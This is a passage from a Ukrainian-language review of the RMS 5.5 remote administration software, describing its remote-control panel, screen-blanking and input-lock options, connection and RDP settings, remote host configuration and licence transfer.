Що стосується функціоналу, призначеного саме для керування, то він виражений спеціальною панелькою вгорі операційного вікна, яка показується при наведенні на смужку курсору миші. Окремо варто відзначити опцію відключення екрану і можливість заборонити введення самому користувачеві віддаленого комп'ютера - це позбавляє оператора техпідтримки від боротьби за мишку або просто від цікавих очей, якщо потрібно налаштувати ПК без користувача. Для людини "на тому кінці дроту" це виявляється у тому, що екран просто заливається суцільним білим тлом, а комп'ютер не реагує на натискання клавіш і дії мишею.

Вікно керування ПК у RMS 5.5 Панель функцій сеансу віддаленого керування RMS 5.5

Не залишили поза увагою і саме з'єднання - для кожного збереженого підключення можна встановити безліч параметрів, включаючи оптимізацію під швидкість мережного з'єднання або, наприклад, параметри кольоровості для віддаленого екрану. Є і така цікава функція, як з'єднання через хост: можна вказати як проміжний вузл хост, до якого ви приєднані, і з його допомогою отримати доступ до RMS-хостів у його локальній мережі. Це дозволяє настроювати комп'ютери в мережах з обмеженим доступом до Інтернету.

Налаштування підключення до RMS 5.5

Навіть для Microsoft RDP відведені окремі набори налаштувань - до речі, вони відповідають стандартним, так що проблем сумісності RMSз іншими хостами RDP не буде.

Налаштування RDP-підключень у RMS 5.5

Є і така корисна можливість, як віддалене налаштування RMS Хоста- Ви просто вибираєте цю опцію, чекаєте близько 5-10 секунд, а потім можете вільно змінювати налаштування модуля RMS Хостна підключеному ПК.

З'єднання для віддаленого налаштування хоста RMS 5.5 Налаштування віддаленого хоста RMS 5.5

Передбачено і режим передачі ліцензій - можна за допомогою клієнта надіслати віддаленому RMS Хостукопію свого ключа, ввести новий ключ або взагалі відкликати вже наявну ліцензію.

Вибір ліцензії, що передається в RMS 5.5

Загальні налаштування RMS Клієнтастислі, але ємні - на дев'яти вкладках зібрані строго структуровані опції функціонування клієнтського модуля.